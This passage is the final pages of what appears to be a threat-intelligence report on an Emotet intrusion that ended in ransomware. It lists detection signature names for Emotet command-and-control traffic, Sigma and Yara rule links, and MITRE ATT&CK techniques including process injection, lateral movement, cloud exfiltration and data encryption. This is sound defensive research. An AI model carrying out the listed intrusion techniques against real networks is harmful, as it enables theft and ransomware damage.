Tracker Reported CnC Server group 25 ET CNC Feodo Tracker Reported CnC Server group 3 ET CNC Feodo Tracker Reported CnC Server group 4 ET CNC Feodo Tracker Reported CnC Server group 5 ET CNC Feodo Tracker Reported CnC Server group 6 ET CNC Feodo Tracker Reported CnC Server group 7 ET CNC Feodo Tracker Reported CnC Server group 8 ET CNC Feodo Tracker Reported CnC Server group 9 ET MALWARE W32/Emotet CnC Beacon 3 Sigma https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/proc_creation_win_emotet_child_process_spawn_pattern.yml Yara https://github.com/The-DFIR-Report/Yara-Rules/blob/main/15184/15184.yar MITRE PowerShell – T1059.001 Process Injection – T1055 File Deletion – T1070.004 Lateral Tool Transfer – T1570 Valid Accounts – T1078 Service Execution – T1569.002 SMB/Windows Admin Shares – T1021.002 Remote System Discovery – T1018 Process Discovery – T1057 Rundll32 – T1218.011 Regsvr32 – T1218.010 Domain Account – T1087.002 Domain Groups – T1069.002 https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 37 of 38 System Information Discovery – T1082 Data Encrypted for Impact – T1486 Network Share Discovery – T1135 Data from Network Shared Drive – T1039 Web Protocols – T1071.001 Remote Access Software – T1219 Exfiltration to Cloud Storage – T1567.002 Remote Desktop Protocol – T1021.001 Malicious File – T1204.002 Spearphishing Attachment – T1566.001 Exploitation of Remote Services – T1210 Internal case #15184 Source: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 38 of 38